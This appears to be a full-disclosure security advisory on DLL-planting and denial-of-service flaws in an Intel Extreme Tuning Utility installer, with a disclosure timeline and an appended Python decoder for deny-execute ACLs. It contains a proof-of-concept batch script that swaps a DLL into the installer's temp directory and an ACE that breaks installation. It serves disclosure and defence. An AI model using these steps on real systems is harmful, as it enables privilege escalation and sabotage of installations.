Hi @ll,

the executable installer of the Intel Extreme Tuning Utility,
version 6.4.1.23 (Latest), released 5/18/2018, available from
via is (SURPRISE!) vulnerable.

CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H


Vulnerability #0:
=================

The executable installer XTU-Setup.exe comes with at least two
OUTDATED and UNSUPPORTED runtime components from Microsoft, one
of which has known and long fixed vulnerabilities!

Component #1:
~~~~~~~~~~~~~

Microsoft SQL Server Compact 3.5 SP2 ENU

This is end-of-life since 4/10/2018; see

Component #2:
~~~~~~~~~~~~~

Microsoft Visual C++ 2005 Runtime 8.0.50727.762

Visual C++ 2005 is end-of-life since 4/12/2016, more than TWO
years ago; see

The latest Visual C++ 2005 Runtime is version 8.0.50727.4940,
published 4/12/2011, updated 6/14/2011, i.e. SEVEN+ years ago.
See and

Also see

The icing on the cake: XTU-Setup.exe tries to install the OUTDATED
and VULNERABLE Microsoft Visual C++ 2005 Runtime 8.0.50727.762
even if a newer version is already installed!

That's a pretty good example for AWFUL BAD software engineering!


Vulnerability #1:
=================

The vcredist_x86.exe package included in XTU-Setup.exe and
executed by it was built with Wix toolset 3.6

See and

I recommend to exercise ENHANCED INTERROGATIONS with Microsoft
about their SLOPPY attitude to software security: the fixes were
released about 2.5 years ago, in cooperation with Microsoft,
FireGiant and me, but Microsoft failed or was too lazy to update
their installer packages.


Demonstrations/proof of concepts:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

These are for STANDARD installations of Windows, i.e. where the
user account created during Windows setup is used.

This precondition is met on typical installations of Windows:
according to Microsoft's own security intelligence reports,
about 1/2 to 3/4 of the about 600 million Windows installations
which send telemetry data have only ONE active user account.
See


A) for the arbitrary code execution with elevation of privilege
---------------------------------------------------------------

1. follow the instructions from
   and build the non-forwarding DLLDUMMY.DLL in your %TEMP%
   directory;

2. create the following batch script:

   --- wixstdba.cmd ---
   :WIXSTDBA
   @if not exist "%temp%\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\.ba1\wixstdba.dll" goto :WIXSTDBA
   copy "%TEMP%\dlldummy.dll" "%temp%\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\.ba1\wixstdba.dll"
   --- EOF ---

3. run the batch script per double click;

4. run XTU-Setup.exe: notice the message boxes displayed from the
   WIXSTDBA.DLL copied into the subdirectory of %TEMP%.


B) for the denial of service
----------------------------

1. add the NTFS access control list entry (D;OIIO;WP;;;WD)
   meaning "deny execution of files in this directory for
   everyone, inheritable to all subdirectories" to the (user's)
   %TEMP% directory.

   NOTE: this does NOT need administrative privileges!

2. execute XTU-Setup.exe: notice the message box displaying the
   failure of the installation about 3/4 way through.


STAY FAR AWAY FROM INTEL'S VULNERABLE CRAPWARE!


stay tuned
Stefan Kanthak


Timeline
~~~~~~~~

2017-09-04    vulnerability report sent to Intel

              no answer, not even an acknowledgement of receipt

2018-03-22    vulnerability report resent to Intel

2018-05-18    updated installers published by Intel, but no
              security advisory

2018-06-05    vulnerability report for the updated but still
              vulnerable installers sent to Intel

2018-09-11    security advisory published by Intel:

2018-09-26    own security advisory published
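

Added example, not part of the original advisory: a small Python decoder for the SDDL ACE from step B.1. It shows why the token WP (bit 0x20) acts as FILE_EXECUTE on files, and it lists the deny-execute ACEs in a DACL so that such an entry on %TEMP% can be spotted. The sample SDDL string, its SID and the function names are constructed for this example.

```python
import re

# SDDL right tokens as access-mask bits. The two-letter directory-service names
# share bit values with the file rights: WP (0x20) is FILE_EXECUTE on a file and
# FILE_TRAVERSE on a directory. Generic rights are shown already mapped to files.
RIGHTS = {
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
    "DT": 0x40, "LO": 0x80, "CR": 0x100,
    "SD": 0x10000, "RC": 0x20000, "WD": 0x40000, "WO": 0x80000,
    "FA": 0x1F01FF, "FR": 0x120089, "FW": 0x120116, "FX": 0x1200A0,
    "GA": 0x1F01FF, "GR": 0x120089, "GW": 0x120116, "GX": 0x1200A0,
}
FILE_EXECUTE = 0x20

# Constructed sample DACL for a user's %TEMP%; the SID is made up.
SAMPLE_SDDL = ("O:BAG:SYD:(D;OIIO;WP;;;WD)(A;OICI;FA;;;SY)(A;OICI;FA;;;BA)"
               "(A;OICI;FA;;;S-1-5-21-1111111111-2222222222-3333333333-1001)")

def parse_ace(text):
    """Split one ACE 'type;flags;rights;object;inherit_object;trustee'."""
    fields = text.strip("()").split(";")
    if len(fields) != 6:
        raise ValueError("unsupported ACE: " + text)
    ace_type, flags, rights, _, _, trustee = fields
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)              # rights may also be a hex mask
    else:
        mask = 0
        for token in re.findall("..", rights):
            mask |= RIGHTS[token]
    flag_set = set(re.findall("..", flags))
    return {"type": ace_type, "flags": flag_set, "mask": mask, "trustee": trustee,
            "inherited_by_files": "OI" in flag_set,        # OI: object inherit
            "applies_to_dir_itself": "IO" not in flag_set}  # IO: inherit only

def exec_denying_aces(sddl):
    """Return the DACL's deny ACEs whose mask includes FILE_EXECUTE."""
    dacl = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    if not dacl:
        return []
    aces = [parse_ace(a) for a in re.findall(r"\(([^)]*)\)", dacl.group(1))]
    return [a for a in aces if a["type"] == "D" and a["mask"] & FILE_EXECUTE]

if __name__ == "__main__":
    for ace in exec_denying_aces(SAMPLE_SDDL):
        print(ace)
```

On a live system the SDDL string for a directory can be obtained with `cacls.exe <directory> /S` and passed to exec_denying_aces().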